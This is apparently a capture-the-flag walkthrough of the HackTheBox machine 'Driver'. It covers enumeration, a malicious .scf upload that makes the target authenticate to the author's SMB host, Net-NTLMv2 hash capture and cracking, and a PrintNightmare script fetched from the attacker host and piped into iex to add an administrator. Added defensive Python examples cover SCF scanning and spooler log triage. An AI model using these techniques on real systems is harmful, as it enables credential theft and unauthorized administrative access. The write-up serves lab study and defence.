Driver

Windows:

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.11.106

80/tcp  open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

135/tcp open  msrpc        Microsoft Windows RPC

445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone
Running (JUST GUESSING): Microsoft Windows 2008|Phone (87%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (87%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-01-17T07:26:10
|_  start_date: 2024-01-17T07:24:34
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.11.106    

All 1000 scanned ports on 10.10.11.106 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|VoIP phone|general purpose|phone
Running: Allen-Bradley embedded, Atcom embedded, Microsoft Windows 7|8|Phone|XP|2012, Palmmicro embedded, VMware Player
OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
OS details: Allen Bradley MicroLogix 1100 PLC, Atcom AT-320 VoIP phone, Microsoft Windows Embedded Standard 7, Microsoft Windows 8.1 Update 1, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, Palmmicro AR1688 VoIP module, VMware Player virtual NAT device
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.11.106

80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0

135/tcp  open  msrpc        Microsoft Windows RPC

445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time: 
|   date: 2024-01-17T07:34:50
|_  start_date: 2024-01-17T07:24:34

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 598.61 seconds

Enumeration: SMB Port 139/445/tcp

Without creds, I can’t connect to the shares, or even list them:

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.11.106

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)     
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.11.106 -u null

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s) 
┌──(kali💀kali)-[~]
└─$ crackmapexec smb 10.10.11.106 -u '' -p '' --shares
SMB         10.10.11.106    445    DRIVER           [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
SMB         10.10.11.106    445    DRIVER           [-] DRIVER\: STATUS_ACCESS_DENIED 
SMB         10.10.11.106    445    DRIVER           [-] Error getting user: list index out of range
SMB         10.10.11.106    445    DRIVER           [-] Error enumerating shares: Error occurs while reading from remote(104)
┌──(kali💀kali)-[~]
└─$ smbclient -N -L //10.10.11.106
session setup failed: NT_STATUS_ACCESS_DENIED

Enumeration: MSRPC Port 135/tcp

┌──(kali💀kali)-[~]
└─$ rpcclient 10.10.11.106 -U ""
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE
┌──(kali💀kali)-[~]
└─$ enum4linux -a 10.10.11.106 

[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.

Enumeration: HTTP Port 80/tcp

Visiting the page returns a request for basic authentication: Firefox isn’t showing me the additional context like nmap did, but looking in Burp at the response it’s there:

When a server wants to request the browser include auth, it will return this 401, and the WWW-Authenticate header says what kind of auth (in this case “Basic”) as well as a realm, which Mozilla docs describe as:

http://10.10.11.106/ (basic auth: admin / admin)
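The 401 / WWW-Authenticate exchange described above, worked through offline as an added example (not code from the writeup). It parses the challenge exactly as nmap printed it for this host, builds the Authorization header a browser sends back, and shows what the server recovers from it; the realm and the admin/admin credential are from the page, the function names and the simulated server are mine. The point worth seeing is that Basic is base64 encoding, not encryption, so over plain HTTP the credential travels in the clear.

```python
"""HTTP Basic authentication, worked through offline.

Added example, not from the Driver writeup. The realm and the admin/admin
credential come from the page; the function names and the simulated
server are assumptions made here.
"""
import base64
import hmac
import re

# WWW-Authenticate value as nmap printed it (IIS sent the realm unquoted).
CHALLENGE = "Basic realm=MFP Firmware Update Center. Please enter password for admin"

# Credential the site accepted, per the nikto output on the page.
VALID_USERS = {"admin": "admin"}


def parse_www_authenticate(header):
    """Return {'scheme': ..., 'realm': ...} from a WWW-Authenticate value.
    Accepts both realm="quoted" and the bare form seen on Driver."""
    scheme, _, params = header.strip().partition(" ")
    out = {"scheme": scheme}
    for m in re.finditer(r'(\w+)\s*=\s*(?:"([^"]*)"|([^,]*))', params):
        key, quoted, bare = m.groups()
        out[key.lower()] = quoted if quoted is not None else bare.strip()
    return out


def build_authorization(user, password):
    """What the browser sends after the user types credentials:
    base64("user:password"). This is encoding, not encryption."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def parse_authorization(header):
    """Server side: recover (user, password) from an Authorization header.
    Returns None if the header is not a well-formed Basic credential."""
    scheme, _, token = header.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode()
    except (ValueError, UnicodeDecodeError):
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None


def check_credentials(header):
    """Constant-time comparison of the presented password with the stored one."""
    parsed = parse_authorization(header)
    if parsed is None:
        return False
    user, password = parsed
    expected = VALID_USERS.get(user)
    if expected is None:
        return False
    return hmac.compare_digest(password.encode(), expected.encode())


def simulate_exchange(user, password):
    """Client/server round trip: the first request carries no credential and
    gets the 401 challenge; the second carries the Basic token. Returns the
    status codes the client sees, e.g. [401, 200]."""
    statuses = [401]
    challenge = parse_www_authenticate(CHALLENGE)
    if challenge["scheme"] != "Basic":
        return statuses  # a browser would not answer a scheme it does not know
    header = build_authorization(user, password)
    statuses.append(200 if check_credentials(header) else 401)
    return statuses


if __name__ == "__main__":
    print(parse_www_authenticate(CHALLENGE))
    print(build_authorization("admin", "admin"))
    print(simulate_exchange("admin", "admin"), simulate_exchange("admin", "wrong"))
```

Because the token decodes back to `admin:admin` with no secret involved, anyone on the path between the browser and this unencrypted IIS site can read the credential; nikto's "default account found" finding is the second half of the same problem.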

http://10.10.11.106/index.php We as a part of centre of excellence, conducts various tests on multi functional printers such as testing firmware updates, drivers etc. support@driver.htb

http://10.10.11.106/fw_up.php Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts 
10.10.11.106	driver.htb

Directory Brute Force:

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://10.10.11.106/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

┌──(kali💀kali)-[~]
└─$ gobuster dir -u http://driver.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -x php,txt

/index.php            (Status: 401) [Size: 20]
/images               (Status: 301) [Size: 148] [--> http://driver.htb/images/]
/Images               (Status: 301) [Size: 148] [--> http://driver.htb/Images/]
/Index.php            (Status: 401) [Size: 20]
/IMAGES               (Status: 301) [Size: 148] [--> http://driver.htb/IMAGES/]
/INDEX.php            (Status: 401) [Size: 20]

NIKTO:

┌──(kali💀kali)-[~]
└─$ nikto -h http://10.10.11.106

+ Server: Microsoft-IIS/10.0
+ /: Retrieved x-powered-by header: PHP/7.3.25.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ / - Requires Authentication for realm 'MFP Firmware Update Center. Please enter password for admin'
+ /: Default account found for 'MFP Firmware Update Center. Please enter password for admin' at (ID 'admin', PW 'admin'). Generic account discovered.. See: CWE-16
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ 8100 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2024-01-16 21:20:50 (GMT-5) (3071 seconds)

Shell as tony

Capture Net-NTLMv2: The page says that what I upload will go to their file share. That implies it’s not necessarily going to the webserver, so looking for a way to upload a webshell doesn’t make much sense.

A classic attack when you have write access to a file share is to drop a .scf file that references an icon file on an SMB share on an attacker-controlled host. If the folder containing the .scf file is opened with File Explorer, the .scf will cause Explorer to connect back to get that icon file and offer Net-NTLMv2 auth negotiation. If I control that host, I can capture that exchange and try to crack the Net-NTLMv2 hash with an offline brute force (like hashcat). I used this technique on the Insane machine Sizzle back in 2019.

SCF files are Windows Shell Command files, and there are way more references on how to make a malicious one than legit uses. Some old Microsoft pages (that no longer exist, but are on the Wayback Machine) show how to create a Show Desktop Shortcut and a View Channels Quick Launch using SCF files. The format is:

[Shell]
Command=2
IconFile=<icon file>
[<thing you want to control>]
Command=<command>

Capture Hash: I’ll abuse the IconFile bit by having it point to my server over SMB, and create exodus.scf:

┌──(kali💀kali)-[~/Desktop]
└─$ nano exodus.scf

[Shell]
Command=2
IconFile=\\10.10.16.4\exodus.ico
[Taskbar]
Command=ToggleDesktop
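Seen from the other side of the share, the SCF format above is simple enough to sweep for. The following is an added example, not code from the writeup and not Responder's: it parses .scf files as the INI-style documents they are and flags any IconFile whose value is a \\host\share path, since Explorer will authenticate to that host as soon as the folder is rendered. The two sample files are constructed here: one is the exodus.scf shown above, the other is the legitimate "Show Desktop" SCF (IconFile=explorer.exe,3) that ships with Windows. The function names are my own.

```python
"""Flag .scf files whose IconFile points at a remote UNC path.

Added example, not from the writeup and not Responder's code. Sample
files are constructed inline; function names are assumptions made here.
"""
import configparser
import re
import tempfile
from pathlib import Path

# \\host\...  (forward-slash variants are normalised before matching)
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")

# Keys whose value Explorer treats as a path to open.
PATH_KEYS = {"iconfile"}

# Constructed sample contents.
MALICIOUS_SCF = (
    "[Shell]\n"
    "Command=2\n"
    "IconFile=\\\\10.10.16.4\\exodus.ico\n"
    "[Taskbar]\n"
    "Command=ToggleDesktop\n"
)
BENIGN_SCF = (
    "[Shell]\n"
    "Command=2\n"
    "IconFile=explorer.exe,3\n"
    "[Taskbar]\n"
    "Command=ToggleDesktop\n"
)


def parse_scf(text):
    """SCF is INI-style; return {section: {key_lower: value}}.
    interpolation=None keeps backslashes and '%' untouched."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.read_string(text)
    return {section: dict(parser[section]) for section in parser.sections()}


def classify_scf(text):
    """Return one finding per path-valued key that targets a remote host."""
    try:
        sections = parse_scf(text)
    except configparser.Error as exc:
        # Not parseable as INI: worth a manual look, but not a UNC finding.
        return [{"section": None, "key": "parse-error", "value": str(exc), "host": None}]
    findings = []
    for section, values in sections.items():
        for key in PATH_KEYS:
            value = values.get(key)
            if value is None:
                continue
            m = UNC_RE.match(value.strip().replace("/", "\\"))
            if m:
                findings.append({"section": section, "key": key,
                                 "value": value, "host": m.group(1)})
    return findings


def scan_share(root):
    """Walk a share root and return (relative path, section, key, host)
    for every .scf that points at a remote host."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() == ".scf":
            text = path.read_text(encoding="utf-8", errors="replace")
            for f in classify_scf(text):
                findings.append((str(path.relative_to(root)), f["section"], f["key"], f["host"]))
    return findings


def demo():
    """Build a throwaway share with one malicious and one benign SCF and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "firmware").mkdir()
        (root / "firmware" / "exodus.scf").write_text(MALICIOUS_SCF)
        (root / "Show Desktop.scf").write_text(BENIGN_SCF)
        return scan_share(root)


if __name__ == "__main__":
    for hit in demo():
        print("remote IconFile:", hit)
```

Run against the root of an upload share on a schedule, or from the file-upload handler before a file is written, and the exodus.scf above produces one hit naming 10.10.16.4 while the stock Show Desktop file produces none. Blocking outbound SMB (445/tcp) at the perimeter removes the payoff even when a file slips through.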

I’ll start Responder, which starts many different kinds of servers (including SMB) to listen for connections and capture Net-NTLMv2 authentication attempts.

┌──(kali💀kali)-[~/Desktop]
└─$ sudo responder -I tun0

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

I’ll upload the .scf file to Driver, and very quickly there’s a hit at responder:

http://driver.htb/fw_up.php?msg=SUCCESS

[SMB] NTLMv2-SSP Client   : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:cdcf90285c5b9adb:[...]

Crack Hash: The Hashcat example hashes page shows this is mode 5600. It breaks instantly in hashcat to liltony:

┌──(kali💀kali)-[~/Desktop]
└─$ hashcat hash.txt -m 5600 /usr/share/wordlists/rockyou.txt

TONY::DRIVER:cdcf90285c5b9adb:5d201f35878917d75243727e985abf12:[...]:liltony
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TONY::DRIVER:cdcf90285c5b9adb:5d201f35878917d752437...000000
Time.Started.....: Wed Jan 17 08:14:59 2024 (0 secs)
Time.Estimated...: Wed Jan 17 08:14:59 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   209.2 kH/s (1.38ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 33792/14344385 (0.24%)
Rejected.........: 0/33792 (0.00%)
Restore.Point....: 30720/14344385 (0.21%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: !!!!!! -> redlips
Hardware.Mon.#1..: Util: 11%

Started: Wed Jan 17 08:14:33 2024
Stopped: Wed Jan 17 08:15:00 2024
┌──(kali💀kali)-[~/Desktop]
└─$ john hash.txt --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
liltony          (tony)     
1g 0:00:00:00 DONE (2024-01-17 08:15) 25.00g/s 844800p/s 844800c/s 844800C/s !!!!!!..redlips
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed. 

Crackmapexec: crackmapexec is a nice way to show that the creds work:

┌──(kali💀kali)-[~/Desktop]
└─$ crackmapexec winrm 10.10.11.106 -u tony -p liltony

SMB         10.10.11.106    5985   DRIVER           [*] Windows 10.0 Build 10240 (name:DRIVER) (domain:DRIVER)
HTTP        10.10.11.106    5985   DRIVER           [*] http://10.10.11.106:5985/wsman
HTTP        10.10.11.106    5985   DRIVER           [+] DRIVER\tony:liltony (Pwn3d!)

WinRM: I’ll use Evil-WinRM to connect to WinRM (installed with sudo gem install evil-winrm):

┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.11.106 -u tony -p liltony

And grab user.txt:

*Evil-WinRM* PS C:\Users\tony\Desktop> cat user.txt
d6df5511a----------------------------------

Shell as administrator - PrintNightmare

Background: This box was developed as part of the Intro to Printer Exploitation track on HackTheBox. Just as it was in development, PrintNightmare exploded onto the scene (I did a post about it here). Driver was left vulnerable to PrintNightmare as well.

Import Exploit: The Invoke-Nightmare PowerShell script can be run from a low-priv shell to add an admin user to the box. I’ll download the exploit with git (and rename the directory to something I’ll recognize):

┌──(kali💀kali)-[~/Desktop]
└─$ git clone https://github.com/calebstewart/CVE-2021-1675

┌──(kali💀kali)-[~/Desktop]
└─$ mv CVE-2021-1675/ invoke-nightmare

Now I can upload the exploit over my WinRM session:

*Evil-WinRM* PS C:\Users\tony\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> upload /home/kali/Desktop/invoke-nightmare/CVE-2021-1675.ps1

However, trying to import the module is blocked by the execution policy. The simplest way to handle this is to read it from my host over HTTP and pipe that into iex (Invoke-Expression). I’ll start a Python web server on my host in the directory where the PS1 script is with python3 -m http.server 80, and then request the file:

┌──(kali💀kali)-[~/Desktop]
└─$ python3 -m http.server 80

*Evil-WinRM* PS C:\programdata> curl 10.10.16.4/CVE-2021-1675.ps1 -UseBasicParsing | iex

-UseBasicParsing allows the file to come back even if the IE engine isn’t available. Now the cmdlet is in my current PowerShell session:

*Evil-WinRM* PS C:\programdata> Get-Command Invoke-Nightmare

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Function        Invoke-Nightmare

Shell: By default, Invoke-Nightmare adds a user adm1n with the password “P@ssw0rd”. I’ll use arguments to add my own user and password:

*Evil-WinRM* PS C:\programdata> Invoke-Nightmare -NewUser "0xdf" -NewPassword "0xdf0xdf"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user 0xdf as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll

The output shows how it writes a DLL file as a payload and then loads it as a printer driver. This DLL just adds a user to the system as a local administrator. Then the script deletes the DLL. Not only is 0xdf a user on the box, but they are also in the Administrators group:

*Evil-WinRM* PS C:\programdata> net user 0xdf
User name                    0xdf
Full Name                    0xdf
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/17/2024 1:27:35 PM
Password expires             Never
Password changeable          1/17/2024 1:27:35 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.
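The Invoke-Nightmare output above (a DLL staged under a user's Temp directory and handed to the spooler as a printer driver) is also what the defender gets to see in the PrintService log. The following is an added example, not from the writeup or the Invoke-Nightmare project: it triages Microsoft-Windows-PrintService/Operational events for driver installs whose file list includes a path outside DriverStore or the spool directory, and for spooler plug-in load failures. The event IDs (316: printer driver added or updated; 808: spooler failed to load a plug-in module) are from my own knowledge of that log, not from the page. The log lines are constructed: the driver name "1234" and the HP file names are made up, while the mxdwdrv.dll and nightmare.dll paths are the ones printed by Invoke-Nightmare above.

```python
"""Triage PrintService/Operational events for driver installs sourced from
user-writable locations.

Added example, not from the writeup or from Invoke-Nightmare. Event IDs
316 and 808 are from my own knowledge of the PrintService log; the sample
lines are constructed, with paths taken from the exploit output on the page.
"""
import re

# Constructed sample: "<time> <event id> <message>" per line.
SAMPLE_LOG = r"""
2024-01-17T13:20:00 316 Printer driver HP Universal Printing PCL 6 for Windows x64 Version-3 was added or updated. Files:- C:\Windows\System32\DriverStore\FileRepository\hpcu\hpcu.dll, C:\Windows\System32\spool\DRIVERS\x64\3\hpcu.dll. No user action is required.
2024-01-17T13:27:35 316 Printer driver 1234 for Windows x64 Version-3 was added or updated. Files:- C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll, C:\Users\tony\AppData\Local\Temp\nightmare.dll. No user action is required.
2024-01-17T13:27:36 808 The print spooler failed to load a plug-in module C:\Windows\system32\spool\DRIVERS\x64\3\New\nightmare.dll, error code 0x45A. See the event user data for context information.
2024-01-17T13:30:00 307 Document 5 printed on printer Microsoft Print to PDF.
"""

LINE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(.*)$")
FILES_RE = re.compile(r"Files:-\s*(.*?)\.\s*No user action", re.S)
PLUGIN_RE = re.compile(r"failed to load a plug-in module\s+(.+?),\s*error code", re.I)

# Directories a legitimately staged printer driver file is expected under.
TRUSTED_PREFIXES = ("c:\\windows\\system32\\driverstore\\",
                    "c:\\windows\\system32\\spool\\")


def driver_files(message):
    """Split the 'Files:-' list of a 316 message into individual paths."""
    m = FILES_RE.search(message)
    if m:
        raw = m.group(1)
    else:
        _, _, raw = message.partition("Files:-")
        raw = raw.strip().rstrip(".")
    return [p.strip() for p in raw.split(",") if p.strip()]


def is_trusted_path(path):
    """True when the file sits where the spooler itself stages drivers."""
    return path.lower().startswith(TRUSTED_PREFIXES)


def analyze(log_text):
    """Return findings for driver installs that reference untrusted paths
    (316) and for spooler plug-in load failures (808)."""
    findings = []
    for line in log_text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        when, event_id, message = m.group(1), int(m.group(2)), m.group(3)
        if event_id == 316:
            for path in driver_files(message):
                if not is_trusted_path(path):
                    findings.append({"time": when, "event_id": 316, "path": path,
                                     "reason": "driver file outside DriverStore/spool"})
        elif event_id == 808:
            pm = PLUGIN_RE.search(message)
            findings.append({"time": when, "event_id": 808,
                             "path": pm.group(1) if pm else None,
                             "reason": "spooler plug-in load failure"})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["time"], f["event_id"], f["reason"], f["path"])
```

Against the constructed log the HP install passes, the install that pulls nightmare.dll from C:\Users\tony\AppData\Local\Temp is flagged, and the 808 a moment later is flagged as well; on a host that is not a print server, disabling the Spooler service makes both events (and the exploit) impossible.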

WinRM: Connecting as the new user gives me access to the full filesystem:

┌──(kali💀kali)-[~]
└─$ evil-winrm -i 10.10.11.106 -u 0xdf -p 0xdf0xdf

*Evil-WinRM* PS C:\Users\0xdf\Documents> cd C:\users\administrator\desktop
*Evil-WinRM* PS C:\users\administrator\desktop> type root.txt
68bb8ed---------------------------
